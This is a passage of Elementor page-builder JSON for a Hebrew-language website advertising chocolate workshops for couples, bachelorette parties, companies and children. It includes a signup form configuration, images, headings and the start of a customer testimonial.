center\",\"background_size\":\"cover\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"25\",\"bottom\":\"40\",\"left\":\"25\",\"isLinked\":false}},\"elements\":[{\"id\":\"3b866986\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"rgba(255,255,255,0.73)\",\"margin\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"63\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"53\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5c8a61fd\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":33,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/logoup.png\"},\"space\":{\"unit\":\"%\",\"size\":18},\"_padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"_background_background\":\"classic\",\"_background_color\":\"#f1d5ad\",\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"1f909fe7\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05dc\\u05d8\\u05e2\\u05d5\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d0\\u05d9\\u05db\\u05d5\\u05ea\\u05d9 \\u05d1\\u05d9\\u05d5\\u05dd \\u05d0\\u05d7\\u05d3 \\u05d8\\u05e2\\u05d9\\u05dd \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#40272c\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":\"45\"},\"typography_font_weight\":\"100\",\"typography_line_height\":{\"unit\":\"em\",\"size\":\"0.9\"},\"_padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"38\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"35\"},\"_padding_tablet\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"10\",\"left\":\"0\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"15\",\"right\":\"0\",\"bottom\":\"15\",\"left\":\"0\",\"isLinked\":false},\"typography_font_family\":\"Open Sans Hebrew\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"35481412\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05d1\\u05d5\\u05d0\\u05d5 \\u05dc\\u05d4\\u05d9\\u05e8\\u05e9\\u05dd \\u05dc\\u05e1\\u05d3\\u05e0\\u05ea \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d4\\u05e7\\u05e8\\u05d5\\u05d1\\u05d4\",\"align\":\"center\",\"title_color\":\"#40272c\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":\"22\"},\"typography_font_weight\":\"bold\",\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"20\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"18\"}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"41e0dd23\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"field_type\":\"text\",\"field_label\":\"\\u05e9\\u05dd\",\"placeholder\":\"\\u05e9\\u05dd\",\"width\":\"100\",\"_id\":\"eovd5tr\",\"required\":\"true\",\"field_options\":\"\",\"inline_list\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"field_html\":\"\",\"custom_id\":\"eovd5tr\"},{\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"placeholder\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"width\":\"100\",\"_id\":\"68frv7y\",\"field_options\":\"\",\"inline_list\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"field_html\":\"\",\"custom_id\":\"68frv7y\"},{\"field_type\":\"tel\",\"field_label\":\"\\u05d8\\u05dc\'\",\"placeholder\":\"\\u05d8\\u05dc\'\",\"width\":\"100\",\"_id\":\"p0rl9g7\",\"required\":\"\",\"field_options\":\"\",\"inline_list\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"field_html\":\"\",\"custom_id\":\"p0rl9g7\"}],\"show_labels\":\"\",\"button_text\":\"\\u05d2\\u05dd \\u05d0\\u05e0\\u05d9 \\u05e8\\u05d5\\u05e6\\u05d4 \\u05dc\\u05d4\\u05d9\\u05e8\\u05e9\\u05dd \\u05dc\\u05e1\\u05d3\\u05e0\\u05d4!\",\"success_message\":\"The message was sent successfully!\",\"error_message\":\"There\'s something wrong... Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong... The form is invalid.\",\"column_gap\":{\"unit\":\"px\",\"size\":\"10\"},\"row_gap\":{\"unit\":\"px\",\"size\":\"15\"},\"field_text_color\":\"#54595f\",\"field_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"field_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_typography_typography\":\"custom\",\"button_typography_font_weight\":\"bold\",\"button_typography_letter_spacing\":{\"unit\":\"px\",\"size\":\"3\"},\"button_background_color\":\"#5c0011\",\"button_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_text_padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":false},\"field_typography_typography\":\"custom\",\"field_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"13\"},\"button_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"14\"},\"_padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"22\",\"bottom\":\"22\",\"left\":\"22\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":false},\"button_background_hover_color\":\"#40272c\",\"input_size\":\"md\",\"button_size\":\"md\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_content\":\"[all-fields]\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_content_2\":\"[all-fields]\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4f74ca63\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#e3e0dd\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"100\",\"bottom\":\"100\",\"left\":\"100\",\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"20\",\"bottom\":\"70\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[{\"id\":\"655473aa\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"55.702\",\"margin\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"12\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"13679594\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05d1\\u05d5\\u05d0\\u05d5 \\u05dc\\u05d0\\u05db\\u05d5\\u05dc \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e2\\u05dd \\u05d7\\u05d1\\u05e8\\u05d9\\u05dd\",\"align\":\"right\",\"title_color\":\"#40272c\",\"typography_font_size\":{\"unit\":\"px\",\"size\":\"35\"},\"typography_font_family\":\"Damion\",\"typography_font_weight\":\"100\",\"typography_text_transform\":\"capitalize\",\"typography_line_height\":{\"unit\":\"em\",\"size\":\"1\"},\"align_mobile\":\"center\",\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"31\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"30\"}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"66f30f3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u05db\\u05d5\\u05dc\\u05e0\\u05d5 \\u05d0\\u05d5\\u05d4\\u05d1\\u05d9\\u05dd \\u05d0\\u05ea \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7 \\u05e9\\u05d0\\u05d7\\u05e8\\u05d9, \\u05d7\\u05dc\\u05e7\\u05e0\\u05d5 \\u05d0\\u05e4\\u05d9\\u05dc\\u05d5 \\u05d0\\u05d5\\u05db\\u05dc\\u05d9\\u05dd \\u05e4\\u05d7\\u05d5\\u05ea \\u05d1\\u05d0\\u05e8\\u05d5\\u05d7\\u05ea \\u05d4\\u05e2\\u05e8\\u05d1 \\u05e8\\u05e7 \\u05db\\u05d3\\u05d9 \\u05e9\\u05e0\\u05d5\\u05db\\u05dc \\u05dc\\u05e0\\u05e6\\u05dc \\u05d0\\u05ea \\u05ea\\u05e4\\u05e8\\u05d9\\u05d8 \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05e2\\u05d3 \\u05ea\\u05d5\\u05de\\u05d5, \\u05d0\\u05d6 \\u05dc\\u05de\\u05d4 \\u05e9\\u05dc\\u05d0 \\u05e0\\u05e2\\u05e9\\u05d4 \\u05d9\\u05d5\\u05dd \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd?<\\/p><p>\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e0\\u05d5\\u05e6\\u05e8\\u05d5 \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3 \\u05dc\\u05e8\\u05d2\\u05e2\\u05d9\\u05dd \\u05d4\\u05d0\\u05dc\\u05d4, \\u05e9\\u05e0\\u05d5\\u05db\\u05dc \\u05dc\\u05d4\\u05d2\\u05d9\\u05e2 \\\"\\u05db\\u05de\\u05e2\\u05d8 \\u05e9\\u05d1\\u05e2\\u05d9\\u05dd\\\" \\u05d5\\u05dc\\u05d9\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05de\\u05d2\\u05d5\\u05d5\\u05df \\u05de\\u05d0\\u05db\\u05dc\\u05d9\\u05dd \\u05d8\\u05e2\\u05d9\\u05de\\u05d9\\u05dd \\u05e9\\u05e1\\u05d5\\u05d1\\u05d1\\u05d9\\u05dd \\u05e1\\u05d1\\u05d9\\u05d1 \\u05d4\\u05d0\\u05d5\\u05db\\u05dc \\u05d4\\u05de\\u05ea\\u05d5\\u05e7 \\u05d4\\u05d0\\u05d4\\u05d5\\u05d1 \\u05e2\\u05dc \\u05db\\u05d5\\u05dc\\u05e0\\u05d5, \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3. \\u05d4\\u05d7\\u05dc \\u05de\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05de\\u05e8\\u05d9\\u05e8 \\u05d5\\u05e2\\u05d3 \\u05dc\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e0\\u05d5\\u05d6\\u05dc, \\u05d4\\u05db\\u05dc \\u05e2\\u05dc \\u05de\\u05e0\\u05ea \\u05dc\\u05d9\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05d9\\u05d5\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\u05d9 \\u05dc\\u05de\\u05d3\\u05d9 \\u05d1\\u05db\\u05dc \\u05e6\\u05d5\\u05e8\\u05d4 \\u05d5\\u05e6\\u05d1\\u05e2, \\u05db\\u05dc \\u05d3\\u05e8\\u05da \\u05d5\\u05e9\\u05e2\\u05d4.\\u00a0<\\/p>\",\"text_color\":\"#54595f\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":19},\"typography_font_family\":\"Open Sans Hebrew\",\"typography_line_height\":{\"unit\":\"em\",\"size\":\"1.6\"},\"align_mobile\":\"center\",\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"14\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"17\"},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"15f91cbb\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"44.298\",\"margin\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"content_position\":\"center\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"385ae28\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/inner-hp.jpg\",\"id\":26}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4477cb\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"structure\":\"40\",\"background_background\":\"classic\",\"background_color\":\"#ffffff\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"100\",\"bottom\":\"100\",\"left\":\"100\",\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"25\",\"bottom\":\"50\",\"left\":\"25\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"20\",\"bottom\":\"60\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[{\"id\":\"702ee38f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"24\",\"bottom\":\"0\",\"left\":\"24\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"screen_sm\":\"custom\",\"screen_sm_width\":\"50\"},\"elements\":[{\"id\":\"60600fc4\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":32,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/c-couple.png\"},\"title_text\":\"\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea\",\"image_space\":{\"unit\":\"px\",\"size\":30},\"image_size\":{\"unit\":\"%\",\"size\":\"75\"},\"description_color\":\"#40272c\",\"description_typography_font_size\":{\"unit\":\"px\",\"size\":\"25\"},\"description_typography_font_family\":\"Damion\",\"description_typography_line_height\":{\"unit\":\"em\",\"size\":\"1\"},\"description_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"19\"},\"description_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"20\"}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"f9b0ce7\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"24\",\"bottom\":\"0\",\"left\":\"24\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"screen_sm\":\"custom\",\"screen_sm_width\":\"50\"},\"elements\":[{\"id\":\"6945b5b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":31,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/c-woman.png\"},\"title_text\":\"\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea\",\"image_space\":{\"unit\":\"px\",\"size\":30},\"image_size\":{\"unit\":\"%\",\"size\":\"75\"},\"description_color\":\"#40272c\",\"description_typography_font_size\":{\"unit\":\"px\",\"size\":\"25\"},\"description_typography_font_family\":\"Damion\",\"description_typography_line_height\":{\"unit\":\"em\",\"size\":\"1\"},\"description_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"19\"},\"description_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"20\"}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"fa7a00f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"24\",\"bottom\":\"0\",\"left\":\"24\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"screen_sm\":\"custom\",\"screen_sm_width\":\"50\"},\"elements\":[{\"id\":\"afa7d0f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":28,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/c-company.png\"},\"title_text\":\"\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea\",\"image_space\":{\"unit\":\"px\",\"size\":30},\"image_size\":{\"unit\":\"%\",\"size\":\"75\"},\"description_color\":\"#40272c\",\"description_typography_font_size\":{\"unit\":\"px\",\"size\":\"25\"},\"description_typography_font_family\":\"Damion\",\"description_typography_line_height\":{\"unit\":\"em\",\"size\":\"1\"},\"description_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"19\"},\"description_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"20\"}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"4a4b992\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"24\",\"bottom\":\"0\",\"left\":\"24\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"screen_sm\":\"custom\",\"screen_sm_width\":\"50\"},\"elements\":[{\"id\":\"c498248\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":30,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/c-kids.png\"},\"title_text\":\"\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd\",\"image_space\":{\"unit\":\"px\",\"size\":30},\"image_size\":{\"unit\":\"%\",\"size\":\"75\"},\"description_color\":\"#40272c\",\"description_typography_font_size\":{\"unit\":\"px\",\"size\":\"25\"},\"description_typography_font_family\":\"Damion\",\"description_typography_line_height\":{\"unit\":\"em\",\"size\":\"1\"},\"description_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"19\"},\"description_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"20\"}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5684ff50\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"id\":24,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/michael-browning-188999.png\"},\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"#190606\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.75},\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"100\",\"bottom\":\"100\",\"left\":\"100\",\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"115\",\"bottom\":\"50\",\"left\":\"115\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"20\",\"bottom\":\"40\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[{\"id\":\"74663cd\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"125f3fc\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05de\\u05d4 \\u05d4\\u05e9\\u05d1\\u05e2\\u05d9\\u05dd \\u05d4\\u05de\\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05e9\\u05dc\\u05e0\\u05d5 \\u05d0\\u05d5\\u05de\\u05e8\\u05d9\\u05dd\",\"align\":\"center\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":\"50\"},\"typography_font_weight\":\"100\",\"typography_text_transform\":\"capitalize\",\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"43\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"40\"}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6410b809\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":32,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/c-couple.png\"},\"_padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"5\",\"left\":\"0\",\"isLinked\":false},\"caption\":\"\\u05e0\\u05ea\\u05d9 \\u05d5\\u05d2\\u05d1\\u05e8\\u05d9\\u05d0\\u05dc\\u05d4 \\u05de\\u05e8\\u05d0\\u05e9\\u05d5\\u05df \\u05dc\\u05e6\\u05d9\\u05d5\\u05df\",\"text_color\":\"#cccccc\",\"caption_typography_typography\":\"custom\",\"caption_typography_font_size\":{\"unit\":\"px\",\"size\":13},\"caption_source\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6c4e5757\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\\"\\u05ea\\u05de\\u05d9\\u05d3 \\u05d0\\u05d4\\u05d1\\u05ea\\u05d9 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05d0\\u05e3 \\u05e4\\u05e2\\u05dd \\u05dc\\u05d0 \\u05d7\\u05e9\\u05d1\\u05ea\\u05d9 \\u05e9\\u05d0\\u05e0\\u05d9 \\u05d0\\u05ea\\u05e8\\u05d2\\u05e9 \\u05db\\u05dc \\u05db\\u05da \\u05de\\u05d9\\u05d5\\u05dd \\u05e9\\u05dc\\u05dd \\u05e9\\u05dc \\u05de\\u05ea\\u05d5\\u05e7. \\u05ea\\u05d5\\u05d3\\u05d4 \\u05e8\\u05d1\\u05d4 \\u05dc\\u05e6\\u05d5\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3 \\u05e9\\u05e2\\u05d6\\u05e8 \\u05dc\\u05d9 \\u05dc\\u05de\\u05e6\\u05d5\\u05d0 \\u05d0\\u05ea \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 